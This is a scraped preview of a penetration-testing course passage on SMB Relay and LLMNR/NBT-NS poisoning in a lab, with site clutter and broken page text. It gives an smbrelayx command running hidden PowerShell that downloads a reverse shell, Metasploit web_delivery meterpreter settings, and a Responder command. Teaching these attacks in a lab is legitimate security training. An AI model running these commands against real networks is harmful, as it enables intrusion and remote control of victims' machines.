The impacket toolkit contains an excellent script for performing this type of

The impacket toolkit contains an excellent script for

This preview shows page 31 - 34 out of 48 pages.

The impacket toolkit contains an excellent script for performing this type of attack. It’s reliable, flexible, and best of all supports attacks against NTLMv2. Let’s perform a simple SMB Relay attack using impacket’s smbrelayx script. Before we begin, boot up your Kali VM, Windows DC VM, and your Windows AD Victim VM. On your Windows DC VM, type the following command in your PowerShell prompt to obtain its IP address. Do the same on your Windows AD Victim VM to obtain its IP address. Once you have the IP addresses of both the Windows AD Victim and Windows DC VMs, open a terminal on your Kali VM and run ifconfig to obtain your IP address. PS C:\> ipconfig [email protected]~# ifconfig
Image of page 31
Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 32 On your Kali VM, change directories into /opt/impacket/examples and use the following command to start the smbrelayx script. In the command below, make sure you change the IP address to the right of the -h flag to the IP address of your Windows AD Victim virtual machine. Similarly, change the second IP address to the IP address of your Kali virtual machine. Notice how we pass a Powershell command to run on the targeted machine using the -c flag. The Powershell command bypasses the Windows AD Victim VM’s execut ion policies and launches a reverse shell downloaded from your Kali virtual machine. Once the payload has been generated, use the following commands within metasploit to launch a server from which to download the reverse shell. As before, change the IP address shown below to the IP address of your Kali virtual machine. The traditional way to perform this attack is to establish a man-in-the-middle with which to intercept an NTLM exchange. However, we can also perform an SMB Relay attack using the LLMNR/NBT-NS poisoning techniques we learned in the last section. To do this, we simply launch responder on our Kali machine as we did before. With responder running, we just need to perform an action on the Windows DC virtual machine that will trigger an NTLM exchange. An easy way to do this is by attempting to access a non- existent SMB share from the Windows DC machine as shown in the screenshot below. [email protected]~# python smbrelayx.py -h 172.16.15.189 -c "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('')" msf > use exploit/multi/script/web_delivery msf (web_delivery) > set payload windows/meterpreter/reverse_tcp msf (web_delivery) > set TARGET 2 msf (web_delivery) > set LHOST 172.16.15.186 msf (web_delivery) > set URIPATH / msf (web_delivery) > exploit [email protected]~# responder -I eth0 -wrf
Image of page 32
Advanced Wireless Attacks Against Enterprise Networks SMB Relays And LLMNR/NBT-NS Poisoning © 2017 Gabriel Ryan All Rights Reserved 33 You should now see three things h appen on your Kali VM. First, you’ll see Responder send a poisoned answer to your Windows DC virtual machine for the NetBIOS name of the non-existent server.
Image of page 33
Image of page 34

You've reached the end of your free preview.

Want to read all 48 pages?

  • Fall '18
  • fasdfasdfasd
  • Wi-Fi, Wireless access point, Gabriel Ryan

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture

Stuck? We have tutors online 24/7 who can help you get unstuck.
A+ icon
Ask Expert Tutors You can ask You can ask You can ask (will expire )
Answers in as fast as 15 minutes